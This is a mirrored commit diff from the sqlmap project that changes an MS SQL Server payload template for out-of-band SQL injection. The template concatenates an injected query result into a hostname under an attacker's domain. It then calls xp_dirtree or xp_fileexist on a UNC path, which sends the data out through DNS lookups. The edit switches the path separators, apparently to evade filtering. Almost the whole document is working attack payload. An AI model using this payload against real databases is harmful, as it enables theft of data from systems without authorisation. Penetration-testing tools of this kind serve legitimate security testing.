mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-05-09 18:23:45 +03:00
Merge 4d259790cd
into 663ab4a544
This commit is contained in:
commit
bedbf3f45e
|
@ -1,4 +1,4 @@
|
|||
DECLARE @host varchar(1024);
|
||||
SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
|
||||
EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"')
|
||||
# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"')
|
||||
EXEC('master..xp_dirtree"//'+@host+'/%RANDSTR1%"')
|
||||
# or EXEC('master..xp_fileexist"//'+@host+'/%RANDSTR1%"')
|
||||
|
|
Loading…
Reference in New Issue
Block a user